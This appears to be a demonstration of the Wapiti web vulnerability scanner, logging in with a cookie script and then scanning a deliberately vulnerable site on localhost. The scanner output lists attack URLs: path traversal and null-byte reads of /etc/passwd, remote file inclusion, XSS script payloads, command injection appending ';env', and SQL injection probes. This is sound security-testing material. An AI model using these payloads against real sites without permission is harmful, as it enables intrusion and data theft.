First I use getcookie.py to login in the restricted area and get the cookie in cookies.txt bash-3.0$ python getcookie.py cookies.txt http://127.0.0.1/vuln/?page=login Please enter values for the folling form : url = http://127.0.0.1/vuln/login.php login (on) : toto password (on) : toto 0 : Then I scan the vuln website using the cookie and excluding the logout script bash-3.0$ python wapiti.py http://127.0.0.1/vuln/ -c cookies.txt -x http://127.0.0.1/vuln/index.php?page=logout .......................... Attacking urls (GET)... ----------------------- Warning fread (article) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?article=http%3A%2F%2Fwww.google.fr%2F&page=articles Unix include/fread (article) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?article=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&page=articles Warning require (page) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?article=plop.txt&page=http%3A%2F%2Fwww.google.fr%2F Unix include/fread (page) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?article=plop.txt&page=%2Fetc%2Fpasswd%00 Unix include/fread (article) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?article=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&page=articles2 Warning require (page) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?article=truc.txt&page=http%3A%2F%2Fwww.google.fr%2F Unix include/fread (page) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?article=truc.txt&page=%2Fetc%2Fpasswd%00 Warning require (page) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?page=http%3A%2F%2Fwww.google.fr%2F Unix include/fread (page) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?page=%2Fetc%2Fpasswd%00 Warning require (page) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?var=plop&page=http%3A%2F%2Fwww.google.fr%2F Unix include/fread (page) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?var=plop&page=%2Fetc%2Fpasswd%00 XSS (var) in http://127.0.0.1/vuln/ Evil url: http://127.0.0.1/vuln/?var=%3Cscript%3Evar+wapiti_687474703a2f2f3132372e302e302e312f7e7369726975732f76756c6e2f_766172%3Dnew+Boolean%28%29%3B%3C%2Fscript%3E&page=xss Command execution (var) in http://127.0.0.1/vuln/eval.php Evil url: http://127.0.0.1/vuln/eval.php?var=a%3Benv 500 HTTP Error code with Evil url: http://127.0.0.1/vuln/test.php?http%3A//www.google.fr/ 500 HTTP Error code with Evil url: http://127.0.0.1/vuln/test.php?a%3Benv 500 HTTP Error code with Evil url: http://127.0.0.1/vuln/test.php?'"( XSS (QUERY_STRING) in http://127.0.0.1/vuln/test.php Evil url: http://127.0.0.1/vuln/test.php?%3Cscript%3Evar%20wapiti_687474703a2f2f3132372e302e302e312f7e7369726975732f76756c6e2f746573742e706870_5155455259535452494e47%3Dnew%20Boolean%28%29%3B%3C/script%3E MySQL Injection (user) in http://127.0.0.1/vuln/usermsg.php Evil url: http://127.0.0.1/vuln/usermsg.php?user=%27%22%28 Attacking forms (POST)... ------------------------- SQL Injection found with http://127.0.0.1/vuln/login.php and params = login=%27%22%28&password=on coming from http://127.0.0.1/vuln/?page=login SQL Injection found with http://127.0.0.1/vuln/login.php and params = login=on&password=%27%22%28 coming from http://127.0.0.1/vuln/?page=login Looking for permanent XSS ------------------------- Upload scripts found : ---------------------- http://127.0.0.1/vuln/upload.php